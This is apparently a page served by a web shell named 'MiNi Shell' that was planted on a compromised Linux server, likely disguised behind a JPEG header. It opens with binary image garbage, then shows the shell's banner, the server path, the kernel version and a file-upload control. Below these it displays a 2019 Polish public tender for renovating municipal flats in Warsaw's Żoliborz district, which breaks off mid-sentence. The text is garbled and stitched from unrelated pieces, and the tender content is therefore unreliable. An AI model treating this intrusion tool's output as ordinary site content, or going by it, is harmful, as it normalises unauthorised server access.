JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20191118/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20191118/622415-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 622415-N-2019 z dnia 2019-11-18 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Zakład Gospodarowania Nieruchomościami w Dzielnicy Żoliborz</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Remont lokali komunalnych mieszkalnych - pustostanów obejmujących I ZADANIE ul. Krasińskiego 20 m. 11 ul. Krasińskiego 27 m. 70 ul. Krasińskiego 29 m. 104 ul. Powązkowska 44b m.74 II ZADANIE ul. Bieniewicka 2a m. 35/36 ul. Bieniewicka 2a m. 17 ul. Marii Kazimiery 1 m.57/58 ul. Gdańska 4a m.28 w Dzielnicy Żoliborz m.st. Warszawy”.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Zakład Gospodarowania Nieruchomościami w Dzielnicy Żoliborz</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">11104337000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Marii Kazimiery</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">01-641</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Warszawa</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">22 8335696, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">mboryckagrabia@zgnzoliborz.waw.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">22 8321835</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://zgnzoliborz.waw.pl </span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://zgnzoliborz.waw.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.zgnzoliborz.waw.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony">Nie</span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Remont lokali komunalnych mieszkalnych - pustostanów obejmujących I ZADANIE ul. Krasińskiego 20 m. 11 ul. Krasińskiego 27 m. 70 ul. Krasińskiego 29 m. 104 ul. Powązkowska 44b m.74 II ZADANIE ul. Bieniewicka 2a m. 35/36 ul. Bieniewicka 2a m. 17 ul. Marii Kazimiery 1 m.57/58 ul. Gdańska 4a m.28 w Dzielnicy Żoliborz m.st. Warszawy”.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZGN/PZP/19/2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">maksymalnej liczby części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci">4</span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">4 części</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Nazwa zadania.Remont mieszkalnych lokali komunalnych - pustostanów obejmujący lokale pod niżej wymienionymi adresami – zadanie I i II:1. ul. Krasińskiego 20 m.112. ul. Krasińskiego 27 m. 703. ul. Krasińskiego 29 m. 1044. ul. Powązkowska 44b m. 74 5. ul. Bieniewicka 2a m. 35/366. ul. Bieniewicka 2a m. 177. ul. Marii Kazimiery 1 m. 57/58 8. ul. Gdańska 4a m. 28w Dzielnicy Żoliborz m.st. Warszawy” III Zakres robót Lok. 1 przy ul. Krasińskiego 20 m.11Branża budowlanaWymiana stolarki drzwiowej wewnętrznej w pokojach, kuchni i łazience, regulacja okien, montaż nawiewników, naprawa tynku (uzupełnienie ubytków po hakach), wykonanie pasów tynku po wymianie instalacji elektrycznej, skucie płytek w kuchni i łazience przed wymianą instalacji elektrycznej, przygotowanie powierzchni pod malowanie, gruntowanie podłoży preparatami, dwukrotne malowanie farbami emulsyjnymi ścian i sufitów, Malowanie lamperii w kuchni, malowanie grzejników, rur, parapetów, zerwanie wykładzin PCV kuchnia korytarz i łazienka, w pokojach cyklina i lakierowanie z wymianą listew przypodłogowych, w kuchni wykładzina PCV, w łazience płytki na posadzce i glazura na ścianie, wywiezienie materiałów z rozbiórki. Branża sanitarnaWymiana kuchni gazowej 4 palnikowej z piekarnikiem, wymiana brodzika i kabiny natryskowej, wymiana miski w-c kompakt z sedesem, wymiana zlewozmywaka, umycie umywalki, wymiana baterii, wymiana podejścia i syfonu oraz udrożnienie odpływu przyborów. Próba ciśnieniowa i protokół z szczelności inst. gazowej oraz opinia kominiarska.Branża elektryczna Demontaż opraw elektrycznych, osprzętu elektrycznego, przewodów, oraz osprzętu w tablicy mieszkaniowej. Wykucie bruzd pod przewody, oraz pod puszki elektryczne.Ułożenie przewodów do obwodów oświetleniowych, i gniazd, zgodnie z wymogami, Wykucie otworów pod puszki, obsadzenie puszek. Wykonanie połączeń w puszkach, podłączenie osprzętu (wyłączników, przełączników, gniazd, przycisków), Montaż tablicy mieszkaniowej wraz z zabezpieczeniami, dzwonka, oraz lamp. Wykonanie pomiarów ochronnych i przedstawienie protokołu. Wykonanie schematu elektrycznego do INNOGY, wraz z opisem oznaczeń obwodów. Elektrycznych wykonanie pomiarów ochronnych i przedstawienie protokołu.Lok. 2 przy ul. Krasińskiego 27 m. 70Branża budowlanaWymiana stolarki drzwiowej wewnętrznej w pokojach, kuchni i łazience, naprawa tynku (uzupełnienie ubytków po hakach), wykonanie pasów tynku po wymianie instalacji elektrycznej, gruntowanie podłoży, przygotowanie powierzchni pod malowanie farbami, dwukrotne malowanie farbami emulsyjnymi, malowanie grzejników, rur i parapetów, zerwanie starych wykładziny w kuchni, wykonanie nowego podłoża, wykonanie cykliny i lakierowanie parkietu w pokojach i korytarzu z wymianą listew przypodłogowych, w kuchni wykładzina PCV, skucie płytek na ścianie i wyk lamperii oraz rozebranie zabudowy pod oknem, w łazience obudowa g/k wanny i obłożenie płytkami, wykonanie nowej posadzki i wykonanie lamperii na ścianach, wywiezienie materiałów z rozbiórki. Branża sanitarnaWymiana kuchni gazowej 4 palnikowej z piekarnikiem, wymiana wanny, wymiana miski wc kompakt z sedesem, wymiana zlewozmywaka, wymiana umywalki, wymiana baterii, wymiana zaworów, podejścia i syfonu oraz udrożnienie odpływu przyborów sanitarnych. Próba szczelności inst. gazowej oraz opinia kominiarska.Branża elektryczna Demontaż opraw elektrycznych, osprzętu elektrycznego, przewodów, oraz osprzętu w tablicy mieszkaniowej. Wykucie bruzd pod przewody, oraz pod puszki elektryczne.Ułożenie przewodów do obwodów oświetleniowych, i gniazd, zgodnie z wymogami, Wykucie otworów pod puszki, obsadzenie puszek. Wykonanie połączeń w puszkach, podłączenie osprzętu (wyłączników, przełączników, gniazd, przycisków), Montaż tablicy mieszkaniowej wraz z zabezpieczeniami, dzwonka, oraz lamp. Wywiezienie gruzu po remoncie.Wykonanie pomiarów ochronnych i przedstawienie protokołu. Wykonanie schematu elektrycznego do INNOGY, wraz z opisem oznaczeń obwodów. Elektrycznych Wykonanie pomiarów ochronnych i przedstawienie protokołu.Lok. 3 przy ul. Krasińskiego 29 m. 104 Branża budowlanaWymiana stolarki drzwiowej wewnętrznej do pokoju i łazienki. Naprawa i uzupełnienie tynku na ścianach, uzupełnienie ubytków po hakach, przygotowanie powierzchni pod malowanie farbami emulsyjnymi, gruntowanie podłoży, dwukrotne malowanie farbami emulsyjnymi ścian i sufitów, malowanie farbami olejnymi lamperii w kuchni, grzejników, parapetów i rur. Zerwanie starego parkietu, wykonanie nowego podłoża w pokoju i kuchni, ułożenie paneli w pokoju, w kuchni wykładziny z PCV z wymianą listew przypodłogowych, obudowa pionu kanalizacyjnego w kuchni i w łazience, łazience demontaż brodzika i ponowna jego zabudowa oraz ułożenie płytek na ścianie w kabinie natryskowej i ułożenie płytek na posadzce łazienki, wykonanie nowej fugi, montaż nawiewników w oknach, wymiana kratek wentylacyjnych, usunięcie gruzu i materiałów z rozbiórki. Branża sanitarnaWymiana kuchni elektrycznej 2 płytowej, wymiana brodzika, wymiana miski w-c kompakt z sedesem, wymiana zlewozmywaka i szafki pod zlewozmywak, wymiana umywalki, wymiana armatury baterii, wymiana zaworów, podejścia, syfonu, udrożnienie odpływu przyborów sanitarnych oraz opinia Kominiarska. Branża elektryczna Demontaż osprzętu w tablicy mieszkaniowej. Sprawdzenie instalacji domofonowej i dzwonkowej, montaż tablicy mieszkaniowej nowej wraz z zabezpieczeniami, dzwonka, Wymiana na nowe wyłączniki i gniazdka. Wykonanie schematu elektrycznego do INNOGY, wraz z opisem oznaczeń obwodów. Elektrycznych, wykonanie pomiarów ochronnych i przedstawienie protokołu.Lok. 4 przy ul. Powązkowska 44b m. 74 Branża budowlanaWymiana stolarki drzwiowej wewnętrznej w pokojach, kuchni i łazience, przygotowanie powierzchni pod malowanie farbami, gruntowanie podłoży preparatami, dwukrotne malowanie farbami emulsyjnymi, dwukrotne malowanie farbami olejnymi tynków lamperii, rur, zabudowa wanny w łazience, montaż nawiewników w oknach, wywiezienie materiałów z rozbiórki.Branża sanitarnaTylko przegląd i szkice Próba szczelności inst. gazowej oraz opinia Kominiarska.Branża elektryczna Wykonanie pomiarów ochronnych i przedstawienie protokołu Wykonanie schematu elektrycznego do INNOGY, wraz z opisem oznaczeń obwodów. Elektrycznych, wykonanie pomiarów ochronnych i przedstawienie protokołu.Lok. 5 przy ul. Bieniewicka 2a m. 35/36 Branża budowlanaWymiana drzwi wejściowych, wymiana stolarki drzwiowej wewnętrznej w pokojach, kuchni i łazience, naprawa tynku (uzupełnienie ubytków po hakach), wykonanie pasów tynku po wymianie instalacji elektrycznej, przygotowanie powierzchni pod malowanie, gruntowanie podłoży preparatami, malowanie farbami emulsyjnymi, malowanie grzejników, rur i parapetów, zerwanie starych wykładzin z PCV, wykonanie wylewki, ułożenie nowych paneli w pokojach i korytarzu, w kuchni wykładzina PCV, Wymiana brodzika, wykonanie nowej posadzki w łazience i wykonanie nowej zabudowy, w ubikacji malowanie lamperii, montaż nawiewników w oknach, wywiezienie materiałów z rozbiórki. Branża sanitarnaWymiana kuchni gazowej na kuchenkę elektryczną 4 palnikową, wymiana wanny, wymiana baterii wannowej wymiana miski wc kompakt z sedesem, wymiana zlewozmywaka, wymiana baterii zlewozmywakowej, wymiana umywalki, wymiana baterii, wymiana zaworów i syfonu, opinia kominiarska.Branża elektrycznaDemontaż opraw elektrycznych, osprzętu elektrycznego, przewodów, oraz osprzętu w tablicy mieszkaniowej. Wykucie bruzd pod przewody, oraz pod puszki elektryczne. Ułożenie przewodów do obwodów oświetleniowych, i gniazd. Wykucie otworów pod puszki, obsadzenie puszek. Wykonanie połączeń w puszkach, podłączenie osprzętu (wyłączników, przełączników, gniazd, przycisków) Montaż tablicy mieszkaniowej wraz z zabezpieczeniami, dzwonka, oraz lamp. Wykonanie schematu elektrycznego do INNOGY, wraz z opisem oznaczeń obwodów. Elektrycznych, wykonanie pomiarów ochronnych i przedstawienie protokołu.Lok. 6 przy ul. Bieniewicka 2a m 17 Branża budowlanaNaprawa i uzupełnienie tynku na ścianach w kuchni, wykonanie pasów tynku po wymianie instalacji elektrycznej, uzupełnienie dziur i ubytków po hakach, wymiana wykładziny w kuchni, przygotowanie powierzchni pod malowanie farbami emulsyjnymi, gruntowanie podłoży, dwukrotne malowanie farbami emulsyjnymi ścian i sufitów, malowanie farbami olejnymi ścian lamperia w kuchni, parapetów, grzejników i rur , naprawa, cyklinowanie i lakierowanie posadzek w pokojach z wymianą listew przypodłogowych, ułożenie wykładziny PCV z listwami w kuchni, wymiana stolarki drzwiowej wewnętrznej w pokojach, kuchni i łazience, montaż nawiewników w oknach, wymiana podokiennika, demontaż szafki w kuchni, wymiana kratek wentylacyjnych, zabezpieczeni podłóg, usunięcie gruzu i materiałów z rozbiórki.Branża sanitarnaWymiana kuchni elektrycznej 2 płytowej, montaż szafki pod kuchenkę elektryczną, wymiana brodzika, wymiana miski wc kompakt z sedesem, umycie zlewozmywaka, umycie baterii, zaworów i syfonu oraz udrożnienie odpływu przyborów sanitarnych, opinia kominiarska.Branża elektryczna Demontaż osprzętu w tablicy mieszkaniowej. Sprawdzenie instalacji domofonowej i dzwonkowej, montaż tablicy mieszkaniowej wraz z zabezpieczeniami, dzwonka, i domofonu.Wykonanie pomiarów ochronnych i przedstawienie protokołu, Wykonanie schematu elektrycznego Tablicy mieszkaniowej do INNOGY, wraz z opisem oznaczeń obwodów. elektrycznych.Lok. 7 przy ul. Marii Kazimiery 1 m. 57/58Branża budowlanaWymiana stolarki drzwiowej wewnętrznej w pokojach, kuchni i łazience, naprawa tynku (uzupełnienie ubytków po hakach), wykonanie pasów tynku po wymianie instalacji elektrycznej, przygotowanie powierzchni pod malowanie farbami, gruntowanie podłoży preparatami, dwukrotne malowanie farbami emulsyjnymi, dwukrotne malowanie farbami olejnymi lamperii, malowanie grzejników, rur i parapetów, zerwanie wykładzin i paneli, wykonanie nowego podłoża pod posadzki z wymianą listew przypodłogowych, ułożenie paneli w pokojach i korytarzu, w kuchni wykładzina z PCV, rozebranie obudowy wanny i wykonanie nowej z obłożeniem płytkami, posadzka w łazience z terakoty, montaż nawiewników w oknach, wywiezienie materiałów z rozbiórki.Branża sanitarnaWymiana kuchni gazowej 4 palnikowej z piekarnikiem, wymiana wanny, wymiana miski wc kompakt z sedesem, wymiana zlewozmywaka, wymiana umywalki, wymiana baterii, wymiana podejścia i syfonu oraz udrożnienie odpływu przyborów sanitarnych. Próba szczelności inst. gazowej oraz opinia kominiarska.Branża elektryczna Demontaż opraw elektrycznych, osprzętu elektrycznego, przewodów, oraz osprzętu w tablicy mieszkaniowej. Wykucie bruzd pod przewody, oraz pod puszki elektryczne. Ułożenie przewodów do obwodów oświetleniowych, i gniazd. Wykucie otworów pod puszki, obsadzenie puszek. Wykonanie połączeń w puszkach, podłączenie osprzętu (wyłączników, przełączników, gniazd, przycisków) Montaż tablicy mieszkaniowej wraz z zabezpieczeniami, dzwonka, oraz lamp. Wykonanie schematu elektrycznego do INNOGY, 